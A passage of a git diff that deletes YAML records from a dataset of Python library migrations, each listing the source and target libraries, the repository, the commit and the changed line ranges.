dataproperty,typepy -commit_message: 'Replace a module: DataProperty to typepy' -commit_url: https://github.com/thombashi/sqlitebiter/commit/26c8e746 -code_changes: -- filepath: sqlitebiter/sqlitebiter.py - lines: - - '13:17' - - '46:46' - - 136:136 - - 227:227 - - 239:239 diff --git a/v1/data/migration/27e2a46_pillow,torchvision.yaml b/v1/data/migration/27e2a46_pillow,torchvision.yaml deleted file mode 100644 index 7ded605..0000000 --- a/v1/data/migration/27e2a46_pillow,torchvision.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 27e2a46_pillow,torchvision -source: pillow -target: torchvision -repo: deep-spin/opennmt-ape -commit: 27e2a46c1d1505324032b1d94fc6ce24d5b67e97 -pair_id: pillow,torchvision -commit_message: cleaning up imagenet example and making it depend on torchvision -commit_url: https://github.com/deep-spin/opennmt-ape/commit/27e2a46c -code_changes: [] diff --git a/v1/data/migration/2960ec6_argparse,configargparse.yaml b/v1/data/migration/2960ec6_argparse,configargparse.yaml deleted file mode 100644 index d90a4d2..0000000 --- a/v1/data/migration/2960ec6_argparse,configargparse.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: 2960ec6_argparse,configargparse -source: argparse -target: configargparse -repo: rocketmap/rocketmap -commit: 2960ec68f85274c37068e2577f28c44eecc4ff26 -pair_id: argparse,configargparse -commit_message: "Fix up this configuration mess (#2021)\n\n* Kill credentials.json\ - \ with fire\n* Match up our command line options with config.ini options\n* Switch\ - \ to ConfigArgParser to make the task of overriding\n config.ini options via command\ - \ line parameters easier\n* This provides a much easier long-term method of maintaining\n\ - \ config/argument options" -commit_url: https://github.com/rocketmap/rocketmap/commit/2960ec68 -code_changes: -- filepath: pogom/utils.py - lines: - - '6:6' - - '70:33' - - '73:35' - - '74:36' - - '75:37' - - '77:29' - - '86:47' - - '87:48' - - '88:49' diff --git a/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml b/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml deleted file mode 100644 index 3c892fd..0000000 --- a/v1/data/migration/2adc6a9_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 2adc6a9_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: dbvis-ukon/coronavis -commit: 2adc6a9320c3dc5c801b75d1e32ca07bc13c2891 -pair_id: xlrd,openpyxl -commit_message: '[refactor] migrate from xlrd to openpyxl and prepare for python 3.9+' -commit_url: 
https://github.com/dbvis-ukon/coronavis/commit/2adc6a93 -code_changes: [] diff --git a/v1/data/migration/2c40713_pytz,pendulum.yaml b/v1/data/migration/2c40713_pytz,pendulum.yaml deleted file mode 100644 index a94a4ae..0000000 --- a/v1/data/migration/2c40713_pytz,pendulum.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 2c40713_pytz,pendulum -source: pytz -target: pendulum -repo: oddluck/limnoria-plugins -commit: 2c40713d3a2778d6f729d896372c3bcd74302104 -pair_id: pytz,pendulum -commit_message: 'WorldTime: replace pytz with pendulum' -commit_url: https://github.com/oddluck/limnoria-plugins/commit/2c40713d -code_changes: -- filepath: WorldTime/plugin.py - lines: - - '12:13' diff --git a/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml b/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml deleted file mode 100644 index 90ba4ea..0000000 --- a/v1/data/migration/2d9cf64_slackclient,slack-sdk.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 2d9cf64_slackclient,slack-sdk -source: slackclient -target: slack-sdk -repo: zulip/python-zulip-api -commit: 2d9cf64db860ab5e5eabb8151254b0f3dab609bd -pair_id: slackclient,slack-sdk -commit_message: 'slack-bridge: Use slack_sdk instead of the deprecated slackclient.' -commit_url: https://github.com/zulip/python-zulip-api/commit/2d9cf64d -code_changes: -- filepath: zulip/integrations/bridge_with_slack/run-slack-bridge - lines: - - 10:10-11 - - '47:48' - - '50:51' - - 84:85 diff --git a/v1/data/migration/2fc0f26_pil,pillow.yaml b/v1/data/migration/2fc0f26_pil,pillow.yaml deleted file mode 100644 index 74386ae..0000000 --- a/v1/data/migration/2fc0f26_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 2fc0f26_pil,pillow -source: pil -target: pillow -repo: django-wiki/django-wiki -commit: 2fc0f26aa3b7f86b79c477ed89fd0aff3a476567 -pair_id: pil,pillow -commit_message: Switch to Pillow and the dev version of sorl v12 -commit_url: https://github.com/django-wiki/django-wiki/commit/2fc0f26a -code_changes: [] diff --git a/v1/data/migration/311c7ce_logbook,loguru.yaml b/v1/data/migration/311c7ce_logbook,loguru.yaml deleted file mode 100644 index ce75a45..0000000 --- a/v1/data/migration/311c7ce_logbook,loguru.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 311c7ce_logbook,loguru -source: logbook -target: loguru -repo: thombashi/sqlitebiter -commit: 311c7ce50a89316d5cab9bb2daef05315175faf2 -pair_id: logbook,loguru -commit_message: Replace the logging library -commit_url: https://github.com/thombashi/sqlitebiter/commit/311c7ce5 -code_changes: -- filepath: sqlitebiter/sqlitebiter.py - lines: - - 15-16:20 - - 64,68:64 diff --git a/v1/data/migration/31212eb_pil,pillow.yaml b/v1/data/migration/31212eb_pil,pillow.yaml deleted file mode 100644 index 4d71207..0000000 --- a/v1/data/migration/31212eb_pil,pillow.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 31212eb_pil,pillow -source: pil -target: pillow -repo: wikibook/flask -commit: 31212eb04c86443fb12a29850ae9d17ecbfada21 -pair_id: pil,pillow -commit_message: Modify library dependency PIL to pillow. 
-commit_url: https://github.com/wikibook/flask/commit/31212eb0 -code_changes: [] diff --git a/v1/data/migration/33c7a3f_pytz,pendulum.yaml b/v1/data/migration/33c7a3f_pytz,pendulum.yaml deleted file mode 100644 index 8ebbece..0000000 --- a/v1/data/migration/33c7a3f_pytz,pendulum.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 33c7a3f_pytz,pendulum -source: pytz -target: pendulum -repo: oddluck/limnoria-plugins -commit: 33c7a3fc0878d87ee803db91c17523a9e61af3ed -pair_id: pytz,pendulum -commit_message: 'NHL/NBA: replace pytz dependency' -commit_url: https://github.com/oddluck/limnoria-plugins/commit/33c7a3fc -code_changes: -- filepath: NHL/plugin.py - lines: - - '35:26' -- filepath: NBA/plugin.py - lines: - - '50:40' diff --git a/v1/data/migration/356ce56_raven,sentry-sdk.yaml b/v1/data/migration/356ce56_raven,sentry-sdk.yaml deleted file mode 100644 index fffdc1f..0000000 --- a/v1/data/migration/356ce56_raven,sentry-sdk.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 356ce56_raven,sentry-sdk -source: raven -target: sentry-sdk -repo: fnp/wolnelektury -commit: 356ce56229b7439ae6f35f8f80e480bdfa8bff56 -pair_id: raven,sentry-sdk -commit_message: Migrate from raven to sentry-sdk. -commit_url: https://github.com/fnp/wolnelektury/commit/356ce562 -code_changes: [] diff --git a/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml b/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml deleted file mode 100644 index 9d6cce6..0000000 --- a/v1/data/migration/35ae8f3_mysql-python,mysqlclient.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 35ae8f3_mysql-python,mysqlclient -source: mysql-python -target: mysqlclient -repo: vippool/clerk -commit: 35ae8f3a8f27de80f9650df805c8abfde2b21800 -pair_id: mysql-python,mysqlclient -commit_message: "fix: mysql-python\u304B\u3089mysqlclient\u3078\u79FB\u884C&\u7D30\ - \u304B\u306A\u4FEE\u6B63" -commit_url: https://github.com/vippool/clerk/commit/35ae8f3a -code_changes: [] diff --git a/v1/data/migration/35d8144_urllib,urllib3.yaml b/v1/data/migration/35d8144_urllib,urllib3.yaml deleted file mode 100644 index 1962603..0000000 --- a/v1/data/migration/35d8144_urllib,urllib3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 35d8144_urllib,urllib3 -source: urllib -target: urllib3 -repo: hail-is/hail -commit: 35d8144a61a788095f6a63fab5f28bcd3cb17a98 -pair_id: urllib,urllib3 -commit_message: fix-maste6 (#5954) -commit_url: https://github.com/hail-is/hail/commit/35d8144a -code_changes: [] diff --git a/v1/data/migration/3abbc43_flask,fastapi.yaml b/v1/data/migration/3abbc43_flask,fastapi.yaml deleted file mode 100644 index ed2b01f..0000000 --- a/v1/data/migration/3abbc43_flask,fastapi.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 3abbc43_flask,fastapi -source: flask -target: fastapi -repo: virtuber/openvtuber -commit: 3abbc431e586218470f47eac10fa6d351c6fe907 -pair_id: flask,fastapi -commit_message: flask to fastapi and uvicorn -commit_url: https://github.com/virtuber/openvtuber/commit/3abbc431 -code_changes: -- filepath: openvtuber-server/src/openvtuber/web/web.py - lines: - - 3:4-5 - - '6:8' diff --git a/v1/data/migration/3abbc43_flask,uvicorn.yaml b/v1/data/migration/3abbc43_flask,uvicorn.yaml deleted file mode 100644 index d7bc655..0000000 --- a/v1/data/migration/3abbc43_flask,uvicorn.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 3abbc43_flask,uvicorn -source: flask -target: uvicorn -repo: virtuber/openvtuber -commit: 3abbc431e586218470f47eac10fa6d351c6fe907 -pair_id: flask,uvicorn -commit_message: flask to fastapi and uvicorn -commit_url: https://github.com/virtuber/openvtuber/commit/3abbc431 -code_changes: -- 
filepath: openvtuber-server/src/openvtuber/web/web.py - lines: - - '3:3' - - '17:16' diff --git a/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml b/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml deleted file mode 100644 index 67586c1..0000000 --- a/v1/data/migration/3f786f4_uwsgi,gunicorn.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 3f786f4_uwsgi,gunicorn -source: uwsgi -target: gunicorn -repo: materialsproject/mpcontribs -commit: 3f786f4d1527e53a5fa2865f71e6bbad8add41a9 -pair_id: uwsgi,gunicorn -commit_message: switch to gunicorn[gevent] -commit_url: https://github.com/materialsproject/mpcontribs/commit/3f786f4d -code_changes: [] diff --git a/v1/data/migration/432afa4_jwt,pyjwt.yaml b/v1/data/migration/432afa4_jwt,pyjwt.yaml deleted file mode 100644 index e75c590..0000000 --- a/v1/data/migration/432afa4_jwt,pyjwt.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 432afa4_jwt,pyjwt -source: jwt -target: pyjwt -repo: dcos/dcos -commit: 432afa46d1e1fc5043f9c7a111858cbdde61f239 -pair_id: jwt,pyjwt -commit_message: 'test-e2e: use the correct jwt library' -commit_url: https://github.com/dcos/dcos/commit/432afa46 -code_changes: [] diff --git a/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml b/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml deleted file mode 100644 index 98984c9..0000000 --- a/v1/data/migration/4377d67_django-rest-swagger,drf-yasg.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 4377d67_django-rest-swagger,drf-yasg -source: django-rest-swagger -target: drf-yasg -repo: opengisch/qfieldcloud -commit: 4377d67a99ed8b6680276cbf4585cbac18439b37 -pair_id: django-rest-swagger,drf-yasg -commit_message: 'Replace the deprecated rest_framework_swagger with drf_yasg - - - using redoc' -commit_url: https://github.com/opengisch/qfieldcloud/commit/4377d67a -code_changes: -- filepath: web-app/qfieldcloud/urls.py - lines: - - 18:20-21 diff --git a/v1/data/migration/43e8ec2_celery,rq.yaml b/v1/data/migration/43e8ec2_celery,rq.yaml deleted file mode 100644 index 39566f2..0000000 --- a/v1/data/migration/43e8ec2_celery,rq.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 43e8ec2_celery,rq -source: celery -target: rq -repo: lonelam/onlinejudgeshu -commit: 43e8ec2d90a3f14b3da385bf679c3287f837ab71 -pair_id: celery,rq -commit_message: "\u5220\u9664 celery \u4F9D\u8D56" -commit_url: https://github.com/lonelam/onlinejudgeshu/commit/43e8ec2d -code_changes: [] diff --git a/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml b/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml deleted file mode 100644 index 94e385a..0000000 --- a/v1/data/migration/45d94dd_gcloud-aio-core,aiohttp.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 45d94dd_gcloud-aio-core,aiohttp -source: gcloud-aio-core -target: aiohttp -repo: talkiq/gcloud-aio -commit: 45d94ddaf969648d5479ff480a92b16d537716f9 -pair_id: gcloud-aio-core,aiohttp -commit_message: 'refactor(bigquery): remove core.http dependency' -commit_url: https://github.com/talkiq/gcloud-aio/commit/45d94dda -code_changes: -- filepath: bigquery/gcloud/aio/bigquery/bigquery.py - lines: - - '6:5' - - 96-100:91-94 diff --git a/v1/data/migration/45fac3c_dataproperty,typepy.yaml b/v1/data/migration/45fac3c_dataproperty,typepy.yaml deleted file mode 100644 index c64629a..0000000 --- a/v1/data/migration/45fac3c_dataproperty,typepy.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: 45fac3c_dataproperty,typepy -source: dataproperty -target: typepy -repo: thombashi/pingparsing -commit: 45fac3cb38661f80fc8bd129ce633cfd15423835 -pair_id: dataproperty,typepy -commit_message: 'Replace a module: DataProperty to typepy' 
-commit_url: https://github.com/thombashi/pingparsing/commit/45fac3cb -code_changes: -- filepath: pingparsing/_pingtransmitter.py - lines: - - 86:87 - - 154:159 - - 100:101 - - 110:112 - - 122:125 - - 144:148 - - 154:159 - - 11:11-12 -- filepath: pingparsing/_pingparsing.py - lines: - - '10:11' - - 134:135 - - 156:157 - - 186:187 - - 233:234 diff --git a/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml b/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml deleted file mode 100644 index 99025f1..0000000 --- a/v1/data/migration/472f336_xlsxwriter,openpyxl.yaml +++ /dev/null @@ -1,13 +0,0 @@ -id: 472f336_xlsxwriter,openpyxl -source: xlsxwriter -target: openpyxl -repo: bcgov/gwells -commit: 472f336f5db32ead27b6f4e171c6b8f782da8a02 -pair_id: xlsxwriter,openpyxl -commit_message: Fixed excel export (no more warnings), removed redundant code -commit_url: https://github.com/bcgov/gwells/commit/472f336f -code_changes: -- filepath: app/backend/wells/management/commands/export.py - lines: - - '11:12' - - '53:53' diff --git a/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml b/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml deleted file mode 100644 index d36fc98..0000000 --- a/v1/data/migration/49cf693_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 49cf693_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: guardicore/monkey -commit: 49cf693197378c1852bda5ea0c9797aa8232ed8c -pair_id: pycrypto,pycryptodome -commit_message: 'Add option for password authentication with island - - Replace PyCrypto with Cryptodome' -commit_url: https://github.com/guardicore/monkey/commit/49cf6931 -code_changes: [] diff --git a/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml b/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml deleted file mode 100644 index e84187a..0000000 --- a/v1/data/migration/4ad53b5_py-bcrypt,bcrypt.yaml +++ /dev/null @@ -1,41 +0,0 @@ -id: 4ad53b5_py-bcrypt,bcrypt -source: py-bcrypt -target: bcrypt -repo: weasyl/weasyl -commit: 4ad53b59da2fd7452546f04025414780911190f2 -pair_id: py-bcrypt,bcrypt -commit_message: 'Change out ''py-bcrypt'' for ''bcrypt''. 
(#80) - - - * Initial changeout of py-bcrypt for pyca''s bcrypt - - - Resolves Issue #52 - - - * Fixed bcrypt implementation switchover - - - Removing inadvertantly added link file, and adding ''/vagrant/ to .gitignore - - - * Style fixes for bcrypt implementation - - - * Fixed spacing error for split line - - - Line 77-78, split parameter did not match starting location of above parameter; - PEP 8 - - - * Remove unneeded parentheses; shift .encode() earlier in function to eliminate - two uses - - - * Pre .encode() remaining HASHSUMs - - - * Unwrap previously wrapped lines' -commit_url: https://github.com/weasyl/weasyl/commit/4ad53b59 -code_changes: [] diff --git a/v1/data/migration/4c3400a_pil,pillow.yaml b/v1/data/migration/4c3400a_pil,pillow.yaml deleted file mode 100644 index 6093701..0000000 --- a/v1/data/migration/4c3400a_pil,pillow.yaml +++ /dev/null @@ -1,11 +0,0 @@ -id: 4c3400a_pil,pillow -source: pil -target: pillow -repo: h3/python-dad -commit: 4c3400a0e706f809adc85b08103b0dd5858fd5b6 -pair_id: pil,pillow -commit_message: Fixed formatting bug in ubuntu sysdef, now dad installs requirements - only on initial setup, changed requirements.txt template to use pillow instead of - PIL since PIL's packaging is messy and breaks under virtualenv -commit_url: https://github.com/h3/python-dad/commit/4c3400a0 -code_changes: [] diff --git a/v1/data/migration/4fc081b_keras,torch.yaml b/v1/data/migration/4fc081b_keras,torch.yaml deleted file mode 100644 index 45b64bc..0000000 --- a/v1/data/migration/4fc081b_keras,torch.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 4fc081b_keras,torch -source: keras -target: torch -repo: charlespikachu/aigames -commit: 4fc081b698262b6a52e65b348c13c1a41e3e0eca -pair_id: keras,torch -commit_message: prepare for training algo1 in trexrush and also add a new algo for - trexrush -commit_url: https://github.com/charlespikachu/aigames/commit/4fc081b6 -code_changes: [] diff --git a/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml b/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml deleted file mode 100644 index 2593943..0000000 --- a/v1/data/migration/50b7bae_mysqlclient,psycopg2.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: 50b7bae_mysqlclient,psycopg2 -source: mysqlclient -target: psycopg2 -repo: desec-io/desec-stack -commit: 50b7baeda75d9e9deb388e4666c372b32d959e95 -pair_id: mysqlclient,psycopg2 -commit_message: 'BREAKING feat(dbapi): switch to postgres, fixes #430 - - - Migration instructions: - - https://github.com/desec-io/desec-stack/pull/432#issuecomment-680785746' -commit_url: https://github.com/desec-io/desec-stack/commit/50b7baed -code_changes: [] diff --git a/v1/data/migration/5169173_flask-restplus,flask-restx.yaml b/v1/data/migration/5169173_flask-restplus,flask-restx.yaml deleted file mode 100644 index 2c89a73..0000000 --- a/v1/data/migration/5169173_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,42 +0,0 @@ -id: 5169173_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: kizniche/mycodo -commit: 516917351d7d8341375db4481ac72910c9510a42 -pair_id: flask-restplus,flask-restx -commit_message: Merge from Flask-RESTPlus to Flask-RESTX ([#742 -commit_url: https://github.com/kizniche/mycodo/commit/51691735 -code_changes: -- filepath: mycodo/mycodo_flask/api/daemon.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/__init__.py - lines: - - '6:6' -- filepath: mycodo/mycodo_flask/api/output.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/math.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/measurement.py 
- lines: - - 8-10:8-10 -- filepath: mycodo/mycodo_flask/api/sql_schema_fields.py - lines: - - '2:2' -- filepath: mycodo/mycodo_flask/api/pid.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/input.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/choices.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/settings.py - lines: - - 7-9:7-9 -- filepath: mycodo/mycodo_flask/api/controller.py - lines: - - 7-9:7-9 diff --git a/v1/data/migration/51f2688_gevent,eventlet.yaml b/v1/data/migration/51f2688_gevent,eventlet.yaml deleted file mode 100644 index 1708620..0000000 --- a/v1/data/migration/51f2688_gevent,eventlet.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: 51f2688_gevent,eventlet -source: gevent -target: eventlet -repo: teamsempo/sempoblockchain -commit: 51f26884e37364117176febbb2649d4fa94918e7 -pair_id: gevent,eventlet -commit_message: 'Move away from gevent again (#433) - - - * friendship ended with eventlet gevent is my new best friend - - - * add dnspython' -commit_url: https://github.com/teamsempo/sempoblockchain/commit/51f26884 -code_changes: [] diff --git a/v1/data/migration/528b986_jwt,pyjwt.yaml b/v1/data/migration/528b986_jwt,pyjwt.yaml deleted file mode 100644 index 6e627f3..0000000 --- a/v1/data/migration/528b986_jwt,pyjwt.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 528b986_jwt,pyjwt -source: jwt -target: pyjwt -repo: reddit/baseplate.py -commit: 528b986f62e566611c00ba4fa13de526a6a78c1e -pair_id: jwt,pyjwt -commit_message: Fix PyPI package name for PyJWT -commit_url: https://github.com/reddit/baseplate.py/commit/528b986f -code_changes: [] diff --git a/v1/data/migration/5393290_pil,pillow.yaml b/v1/data/migration/5393290_pil,pillow.yaml deleted file mode 100644 index f9bcd27..0000000 --- a/v1/data/migration/5393290_pil,pillow.yaml +++ /dev/null @@ -1,10 +0,0 @@ -id: 5393290_pil,pillow -source: pil -target: pillow -repo: slav0nic/djangobb -commit: 53932904f35c8d8f60628fdc33eb618e450abbe2 -pair_id: pil,pillow -commit_message: update to requirements (using Pillow than PIL that is obsolete. 
Also - added new haystack and security fixes of django) -commit_url: https://github.com/slav0nic/djangobb/commit/53932904 -code_changes: [] diff --git a/v1/data/migration/53f2073_requests,aiohttp.yaml b/v1/data/migration/53f2073_requests,aiohttp.yaml deleted file mode 100644 index 464ee10..0000000 --- a/v1/data/migration/53f2073_requests,aiohttp.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 53f2073_requests,aiohttp -source: requests -target: aiohttp -repo: mkdir700/chaoxing_auto_sign -commit: 53f2073234e00bef35896690e748eabd4b4632ed -pair_id: requests,aiohttp -commit_message: "\u4FEE\u590D\u901F\u5EA6\u8FC7\u5FEB\u5BFC\u81F4\u7684\u95EE\u9898" -commit_url: https://github.com/mkdir700/chaoxing_auto_sign/commit/53f20732 -code_changes: [] diff --git a/v1/data/migration/547f6d9_lockfile,fasteners.yaml b/v1/data/migration/547f6d9_lockfile,fasteners.yaml deleted file mode 100644 index 69566e1..0000000 --- a/v1/data/migration/547f6d9_lockfile,fasteners.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: 547f6d9_lockfile,fasteners -source: lockfile -target: fasteners -repo: kizniche/mycodo -commit: 547f6d9f22e569007c1066e36ee5142f5e1b533d -pair_id: lockfile,fasteners -commit_message: Replace deprecated LockFile with fasteners (#260) -commit_url: https://github.com/kizniche/mycodo/commit/547f6d9f -code_changes: -- filepath: mycodo/sensors/mh_z16.py - lines: - - 155:156 - - '22:22' - - 51:152 -- filepath: mycodo/sensors/k30.py - lines: - - 101:100 - - '3:3' - - 95:96 -- filepath: mycodo/controller_sensor.py - lines: - - '31:26' -- filepath: mycodo/sensors/mh_z19.py - lines: - - 101:102 - - '3:3' - - 95:98 -- filepath: mycodo/devices/atlas_scientific_uart.py - lines: - - '5:3' - - '51:54' - - '55:58' -- filepath: mycodo/devices/atlas_scientific_i2c.py - lines: - - '7:3' - - 77:79 - - 81:83 diff --git a/v1/data/migration/56e3253_python-ldap,ldap3.yaml b/v1/data/migration/56e3253_python-ldap,ldap3.yaml deleted file mode 100644 index 3bfba8e..0000000 --- a/v1/data/migration/56e3253_python-ldap,ldap3.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 56e3253_python-ldap,ldap3 -source: python-ldap -target: ldap3 -repo: tracim/tracim -commit: 56e3253fe473d1a9d18f197bad11399259958d5e -pair_id: python-ldap,ldap3 -commit_message: Use pyramid_ldap3 instead of pyramid_ldap -commit_url: https://github.com/tracim/tracim/commit/56e3253f -code_changes: [] diff --git a/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml b/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml deleted file mode 100644 index 0a876d6..0000000 --- a/v1/data/migration/57d12c4_openpyxl,xlsxwriter.yaml +++ /dev/null @@ -1,12 +0,0 @@ -id: 57d12c4_openpyxl,xlsxwriter -source: openpyxl -target: xlsxwriter -repo: bcgov/gwells -commit: 57d12c42941e0afb07ac46fb51f8316d6c5a0cea -pair_id: openpyxl,xlsxwriter -commit_message: openpyxl seems to cause pod to crash - maybe too much memory? -commit_url: https://github.com/bcgov/gwells/commit/57d12c42 -code_changes: -- filepath: app/backend/wells/management/commands/export.py - lines: - - '12:12' diff --git a/v1/data/migration/58237dc_mysql-python,pymysql.yaml b/v1/data/migration/58237dc_mysql-python,pymysql.yaml deleted file mode 100644 index 0fd4573..0000000 --- a/v1/data/migration/58237dc_mysql-python,pymysql.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 58237dc_mysql-python,pymysql -source: mysql-python -target: pymysql -repo: hustlzp/flask-boost -commit: 58237dc1f7a1296630951179b78a29a77c730b85 -pair_id: mysql-python,pymysql -commit_message: Use PyMySQL instead of MySQL-python to support Python3. 
-commit_url: https://github.com/hustlzp/flask-boost/commit/58237dc1 -code_changes: [] diff --git a/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml b/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml deleted file mode 100644 index dc5ae63..0000000 --- a/v1/data/migration/5924dc0_pycrypto,pycryptodome.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5924dc0_pycrypto,pycryptodome -source: pycrypto -target: pycryptodome -repo: n1nj4sec/pupy -commit: 5924dc061834370c0b0688ff21d86bcbcfbeb000 -pair_id: pycrypto,pycryptodome -commit_message: Let's try to use pycryptodome instead of pycrypto -commit_url: https://github.com/n1nj4sec/pupy/commit/5924dc06 -code_changes: [] diff --git a/v1/data/migration/598f275_flask-restplus,flask-restx.yaml b/v1/data/migration/598f275_flask-restplus,flask-restx.yaml deleted file mode 100644 index 7e61b45..0000000 --- a/v1/data/migration/598f275_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: 598f275_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: pythondataintegrator/pythondataintegrator -commit: 598f275f11bdb1796b4ea0f6b3676a45758c08c4 -pair_id: flask-restplus,flask-restx -commit_message: requirements updated and restx integrated. some model updated -commit_url: https://github.com/pythondataintegrator/pythondataintegrator/commit/598f275f -code_changes: -- filepath: src/api/controllers/operation/models/DataOperationModels.py - lines: - - '5:5' -- filepath: src/api/controllers/operation/models/JobSchedulerModels.py - lines: - - '5:5' -- filepath: src/api/infrastructor/api/ResourceBase.py - lines: - - '1:1' -- filepath: src/api/controllers/common/models/CommonModels.py - lines: - - '3:5' -- filepath: src/api/IocManager.py - lines: - - '6:6' -- filepath: src/api/controllers/integration/models/DataIntegrationModels.py - lines: - - '4:4' -- filepath: src/api/controllers/job/models/JobModels.py - lines: - - '4:4' -- filepath: src/api/controllers/connection/models/ConnectionModels.py - lines: - - '4:4' diff --git a/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml b/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml deleted file mode 100644 index 2170af6..0000000 --- a/v1/data/migration/59d8319_flask-restplus,flask-restx.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: 59d8319_flask-restplus,flask-restx -source: flask-restplus -target: flask-restx -repo: apryor6/flaskerize -commit: 59d8319355bf95f26949fe13ac3d6be5b5282fb6 -pair_id: flask-restplus,flask-restx -commit_message: Update to use flask-restx -commit_url: https://github.com/apryor6/flaskerize/commit/59d83193 -code_changes: -- filepath: flaskerize/generate.py - lines: - - 152:152 -- filepath: flaskerize/schematics/entity/files/{{ name }}.template/controller.py.template - lines: - - '1:1' - - '3:3' -- filepath: flaskerize/schematics/flask-api/files/{{ name }}.template/app/__init__.py - lines: - - '3:3' -- filepath: flaskerize/schematics/flask-api/files/{{ name }}.template/app/widget/controller.py - lines: - - '3:3' diff --git a/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml b/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml deleted file mode 100644 index 0899e0d..0000000 --- a/v1/data/migration/5a842ae_kafka-python,confluent-kafka.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: 5a842ae_kafka-python,confluent-kafka -source: kafka-python -target: confluent-kafka -repo: openstack/oslo.messaging -commit: 5a842ae15582e4eedfb1b2510eaf4a8997701f58 -pair_id: kafka-python,confluent-kafka -commit_message: 'Switch driver to confluent-kafka client library 
- - - This patch switches the kafka python client from kafka-python to - - confluent-kafka due to documented threading issues with the - - kafka-python consumer and the recommendation to use multiplrocessing. - - The confluent-kafka client leverages the high performance librdkafka - - C client and is safe for multiple thread use. - - - This patch: - - * switches to confluent-kafka library - - * revises consumer and producer message operations - - * utilizes event.tpool method for confluent-kafka blocking calls - - * updates unit tests - - * adds kafka specific timeouts for functional tests - - * adds release note - - - Depends-On: Ice374dca539b8ed1b1965b75379bad5140121483 - - Change-Id: Idfb9fe3700d882c8285c6dc56b0620951178eba2' -commit_url: https://github.com/openstack/oslo.messaging/commit/5a842ae1 -code_changes: -- filepath: oslo_messaging/_drivers/impl_kafka.py - lines: - - 220-232:231-248 - - 288-297:316-326 - - 26-28:18-19 diff --git a/v1/data/migration/5c76c96_xlrd,openpyxl.yaml b/v1/data/migration/5c76c96_xlrd,openpyxl.yaml deleted file mode 100644 index a3db42c..0000000 --- a/v1/data/migration/5c76c96_xlrd,openpyxl.yaml +++ /dev/null @@ -1,9 +0,0 @@ -id: 5c76c96_xlrd,openpyxl -source: xlrd -target: openpyxl -repo: asehmi/data-science-meetup-oxford -commit: 5c76c96f1062ddf9be986f6b8416101aef88d0cd -pair_id: xlrd,openpyxl -commit_message: '[security fix] replacing xlrd default with explicit openpyxl in pd.read_excel()' -commit_url: https://github.com/asehmi/data-science-meetup-oxford/commit/5c76c96f -code_changes: [] diff --git 